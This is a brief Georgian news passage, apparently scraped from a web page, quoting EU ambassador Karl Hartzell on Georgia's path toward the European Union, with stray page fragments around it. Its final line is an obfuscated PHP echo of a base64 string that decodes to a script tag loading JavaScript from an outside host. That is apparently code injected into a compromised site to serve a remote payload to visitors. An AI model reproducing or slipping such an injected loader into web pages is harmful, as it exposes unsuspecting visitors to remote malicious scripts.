celsiusi
ავერსი შნაიდერი
ფაქტი ისაა, რომ საქართველოს შესთავაზეს იმ კარში შესვლა, რომელიც ახლა ევროკავშირისკენ სვლისთვის ღიაა, – ამის შესახებ საქართველოში ევროკავშირის ელჩმა კარლ ჰარცელმა "ამერიკის ხმასთან" ინტერვიუში ისაუბრა.
 
"რაც მე მაშინებს ის არის, რომ ისინი, ვინც ზოგჯერ აკრიტიკებენ ან ეჭვქვეშ აყენებენ ევროკავშირის, მისი წევრი ქვეყნების გადაწყვეტილებას, აშკარად ცდილობენ ამით საქართველოს წინსვლისადმი ევროკავშირის გულწრფელობის მიმართ ეჭვის დათესვას. ჩემი აზრით, კრიტიკის ეს კატეგორია ცინიკურია და რაც მთავარია, საზიანოა როგორც საქართველოსთვის, ისე საქართველოსა და ევროკავშირს შორის ურთიერთობებისთვის. ფაქტი ისაა, რომ საქართველოს შესთავაზეს იმ კარში შესვლა, რომელიც ახლა ევროკავშირისკენ სვლისთვის ღიაა. ბურთი ახლა საქართველოს მოედანზეა და მან უნდა უზრუნველყოს, რომ გასცდეს ამ კარის ზღურბლს. ეს არის ქვეყანა, რომელმაც წარსულში მიაღწია და გააფორმა ხელშეკრულებები ასოცირების შეთანხმების, ღრმა და ყოვლისმომცველი ვაჭრობის ზონის, უვიზო რეჟიმის შესახებ. – განაცხადა კარლ ჰარცელმა.
 
 
600
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");